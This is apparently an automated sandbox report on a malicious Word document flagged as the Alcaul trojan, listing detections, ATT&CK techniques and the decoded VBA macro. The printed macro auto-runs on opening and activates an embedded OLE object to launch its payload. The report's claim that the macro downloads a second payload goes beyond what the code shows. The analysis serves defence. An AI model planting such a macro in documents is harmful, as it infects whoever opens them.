MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code automatically when the document is opened. ClamAV detections indicate this is a known trojan. The Document_Open macro likely attempts to download and execute a secondary payload, aligning with the 'Spearphishing Attachment' initial access tactic.
Heuristics 3
-
ClamAV: Doc.Trojan.Alcaul-21 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Alcaul-21
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 502 bytes |
SHA-256: 78fc741e2168308f4da4e6d5772b463264b4a58c2f9bfb878bf6bb82d3d70077 |
|||
|
Detection
ClamAV:
Doc.Trojan.Olerun-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub document_open()
On Error Resume Next
'by alcopaul
obj = ActiveDocument.Shapes(1).OLEFormat.ClassType
With ActiveDocument.Shapes(1).OLEFormat
.ActivateAs ClassType:=obj
.Activate
End With
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.